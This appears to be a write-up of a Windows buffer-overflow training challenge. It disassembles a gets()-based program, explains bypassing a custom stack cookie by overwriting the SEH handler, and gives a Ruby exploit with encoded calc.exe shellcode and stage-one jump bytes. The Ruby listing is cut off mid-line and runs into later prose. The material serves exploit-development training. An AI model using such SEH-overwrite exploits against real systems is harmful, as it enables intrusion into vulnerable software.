Advanced Windows Buffer Overflows: Take #2

This time around we will take a look at the second challenge taken from VRT's AWBO challenges. Let's go straight for it by looking at the disassembly dump:
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 sub     esp, 1036
.text:00401009                 push    ebx
.text:0040100A                 push    esi
.text:0040100B                 push    edi
.text:0040100C                 mov     eax, endSequence
.text:00401011                 mov     [ebp+Buf1], eax ; Buf1 = "\x00\x0a\x0d\x20"
.text:00401014                 mov     cl, byte_406034
.text:0040101A                 mov     [ebp+var_4], cl
.text:0040101D                 int     3               ; Trap to Debugger
.text:0040101E                 lea     edx, [ebp+Buffer]
.text:00401024                 mov     [ebp+var_C], edx
.text:00401027                 lea     eax, [ebp+Buffer]
.text:0040102D                 push    eax             ; Buffer
.text:0040102E                 call    _gets
.text:00401033                 add     esp, 4
.text:00401036                 mov     ecx, [ebp+var_C]
.text:00401039                 push    ecx
.text:0040103A                 push    offset Format   ; "You sent me: %s"
.text:0040103F                 call    _printf
.text:00401044                 add     esp, 8
.text:00401047                 push    4               ; Size
.text:00401049                 push    offset nil_r_n_space ; Buf2
.text:0040104E                 lea     edx, [ebp+Buf1]
.text:00401051                 push    edx             ; Buf1
.text:00401052                 call    _memcmp
.text:00401057                 add     esp, 0Ch
.text:0040105A                 test    eax, eax
.text:0040105C                 jz      short loc_40107C
.text:0040105E                 push    offset aFail_   ; "Fail.\n"
.text:00401063                 call    _printf
.text:00401068                 add     esp, 4
.text:0040106B                 push    4               ; Size
.text:0040106D                 push    offset aAaaa    ; "AAAA"
.text:00401072                 push    0               ; Dst
.text:00401074                 call    _memcpy
.text:00401079                 add     esp, 0Ch
.text:0040107C
.text:0040107C loc_40107C:                             ; CODE XREF: _main+5Cj
.text:0040107C                 xor     eax, eax
.text:0040107E                 pop     edi
.text:0040107F                 pop     esi
.text:00401080                 pop     ebx
.text:00401081                 mov     esp, ebp
.text:00401083                 pop     ebp
.text:00401084                 retn
.text:00401084 _main           endpIn essence what we have here is a simple program thats uses C's
gets() function to receive input from the user. The obviosu attack vector is to overwrite some information on the stack. Unfortunately, this function places a custom cookie consisting on the 4 byte sequence 0x00 0x20 0x0a 0x0d . Then it's clear that we can't overflow the return address in the traditional sense because a check is made right before returning the function to check that the cookie contains this very value and if the check fails, we try to make a impossible memcpy into address 0x00000000 which causes and exception. Talking about impossible paths and exception, the only choice we have is to go after the exception handler. Since the system we're playing with is Windows 2000, we have a very easy platform where we can abuse the Structured Exception Handler (SEH from now on). Like we did last time, using metasploit's pattern generating tools we will analyze the stack situation and see where this SEH structure is located. Research will show that the EXCEPTION_REGISTRATION structure is located 1084 bytes after the beginning of our input. Let's remind ourselves how this stack structure looks like: The structure contains two members, first of which is a pointer to the next EXCEPTION_REGISTRATION structure (remember that exceptions are chained across stack frames) and the second being the Exception Handler itself. As we're using Windows 2000, the ebx register always points into to the current frame's EXCEPTION_REGISTRATION structure. We will use to our advantage to overwrite the handler with the address of a 'jmp ebx' instruction, redirecting execution to the beginning of the EXCEPTION_REGISTRATION structure. Since we're going to abuse the exception handling right away in our stack frame, we don't need to care about the pointer to the next EXCEPTION_REGISTRATION structure. Therefore, we will place a small piece of code in the beginning of the structure in such a way that once execution comes back after the 'jmp ebx' instruction, we will jump over the bytes pointing to the 'jmp ebx' instruction, where our first stage shellcode will be awaiting. From now on, we have full control of the execution and we can place whatever code we want to run after our 'tweaked' EXCEPTION_REGISTRATION structure. Unfortunately there's very little stack space left because this is a one-stack-frame program. What we will do in this case, is place some special assembly that will send us back to the beginning of our user input where we have more than a thousand free bytes which should be enough for a PoC shellcode. All this considered, this is the layout of our exploit input: | NOP sled | Shellcode | jump-over-struct | ret_addr | stage1 Since ebx points the EXCEPTION_REGISTRATION structure and our user input will be close before it, we will decrement ebx sequentially until we can make it have a value that points into our input. We need to make the arguments of this decrement opcodes smaller or equal to 0x7F because otherwise we would be using a full 4 bytes operand and that would add null bytes to our shellcode, which we don't want. This is the exploit code in ruby format:
#!/usr/bin/env ruby

# windows/exec - 304 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=process, CMD=calc.exe
shellcode = "\x89\xe0\xdd\xc5\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x50\x44\x45\x50\x43\x30" +
"\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55" +
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b" +
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" +
"\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4d\x49\x4e\x4c" +
"\x4b\x34\x49\x50\x44\x34\x43\x37\x49\x51\x48\x4a\x44\x4d" +
"\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x46\x34\x51\x34" +
"\x43\x34\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x46\x44\x43\x31" +
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" +
"\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31" +
"\x4a\x4b\x4d\x59\x51\x4c\x51\x34\x45\x54\x48\x43\x51\x4f" +
"\x46\x51\x4c\x36\x43\x50\x46\x36\x43\x54\x4c\x4b\x47\x36" +
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" +
"\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4b\x33" +
"\x49\x50\x42\x4a\x46\x30\x42\x48\x43\x4e\x49\x48\x4b\x52" +
"\x42\x53\x42\x48\x4c\x58\x4b\x4e\x4c\x4a\x44\x4e\x50\x57" +
"\x4b\x4f\x4b\x57\x43\x53\x43\x51\x42\x4c\x42\x43\x46\x4e" +
"\x42\x45\x42\x58\x45\x35\x43\x30\x41\x41"

# jump over Handler overwrite
jump = "\xCC\xEB\x10\xCC"

# decrement ebx to point to our shellcode and jump to it
stage1 = "\x83\xEB\x7F"*8+"\xFF\xE3"

# put it all together and print it
puts ("\x90"*(1084-shellcode.length))<
              WinExec()
              to execute calc.exe. Since this is quite small program and runs very fast and
              WinExec()
              is an asynchronous call, the API doesn't have enought time to actually finish executing the call and hence, only works in a debugger environment making it run step-by-step (to give enough time to the API call). The basic workaround for this is to include a call to
              Sleep()
              in the shellcode, but since these shellcodes are quite optimized it's quite a pain in the ass editing or tweaking them. My basic objective for this challenge was to make it run arbitrary code, and that's clearly done. Also I've recently got a copy of the flamboyant new edition of Windows Internals and I'm quite eager to dive in it.
              Credits go to
              Ruben Santamarta
              for pointing out the WinExec issue. See you around!